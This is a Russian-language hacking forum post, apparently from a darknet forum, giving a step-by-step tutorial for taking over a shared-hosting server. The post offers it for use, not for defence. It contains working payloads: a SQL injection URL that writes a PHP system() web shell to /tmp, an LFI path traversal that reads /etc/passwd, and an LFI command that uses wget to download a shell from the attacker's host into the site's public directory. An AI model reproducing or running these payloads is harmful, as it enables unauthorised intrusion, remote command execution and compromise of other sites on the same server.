Заливаем шелл

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

KrevedKo

Участник

KrevedKo

Участник
13 Сен 2015
203
119
Подготовка:
Итак речь пойдёт об очинь изящном и важном способе захватить целевой сервер. О чом многие хацкеры даже не думают тык ето о том што очинь даже неплохо когда сервер хостит много сайтов.
Скажем мы выбрали цель(сервак), делаем реверс IP lookup, штоб узнать скока сайтов захостено там. Тык вот, сервер значт хостит 5 сайтов к премеру. После тыкания и скана на уязвимости на всех 5 сайтах, находим один каторый уязвим для SQLi и другой каторый уязвим для LFi.

Атака:
Естессно большинство хацкеров выберут SQLi штоб взять учотку админа и попробывать залогиницца, потомушто ето быстрее нежели через LFi если /proc/self/environ не представлен на LFi-уязвимом сайте.
Такшто впринцыпе мы всё делаем в етом случае верно, но когда мы пробуем залогиницца с учоткой которую мы увели из ДБ, она оказываецца устаревшей и вооще беспонтовой.
Чо теперь? Сдадимся? Не.

Атака 1.
Итак, если у нас есть верные привелегии в SQLi конкретново юзера, мы можым прописать файлы на сервер через скуль. Итак, мы будим добавлять файл в папку в которую можно записывать, как правило папка temp записываемая, посему нам надо записать туда однолинейный шелл каторый позволит нам выполнять команды на сервере. Ну типа как php шелл, тока миниатюрный и который юзаецца через урл, безо всяких интерфейсов.
Код:
http://www.site.com/index.php?ID=-1 union select '<?system($_GET[cmd])?>',2,3,4,5 into outfile "/tmp/cmd.txt"--
Тут мы закидываем cmd.txt каторый являецца нашим шеллом в tmp папку, каторая являецца записываемой. Обыкновенный скуль, 5 колонок, 1-я юзаецца для получения данных, так же, как и при получении версии version(), и просто добавляя в outfile"/tmp/cmd.txt" в конец синтаксиса.
ТЕперь наш шелл создан и мы юзаем $cmd различные.

Атака 2.
Теперь когда у нас есть наш файло на серваке вернёмся к нашему LFi уязвимому сайту, который на том же сервере и прочтём cmd.txt, попробуем выполнить команду и надеемся на то што шелл поднимецца. Етот шаг довольно прост.
Типичная уязвимость LFI :
Код:
http://www.site.com/index.php?file=../etc/passwd
Читаем cmd.txt
Прочтём CMD.txt by используя LFI уязвимость:
Код:
http://www.site.com/index.php?file=../tmp/cmd.txt
Запускаем команду на CMD.txt используя LFI уязвимость:
Код:
http://www.site.com/index.php?file=../tmp/cmd.txt&cmd=wget http://[email protected]/myshell.txt -O /full-path-of-site/public_html/shell.php
(Ето запустит $cmd variable в cmd.txt, штоб выполнить wget команду которая сольёт текстовый файло с нашево сервака, каторый являецца php шеллом с .тхт расширением и -O /full-path-of-site/public_html/shell.php команда переименует файло в shell.php, и конешно нам надо найти полный путь туда, штобы мы могли слить наш шелл в папку из которой мы можем открыть наш шелл браузером)

Открываем шелл:
Код:
http://www.site.com/shell.php
(Мы залили шелл юзая LFi уязвимость сайта, так што шелл пайдёт в root папку("hosting directory") сайта где мы ево сохранили)

Всё, сервер благополучно взломан.
Трюк забавный, короткий а главное действенный.
 
  • Лайк
Reactions: lucefer

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя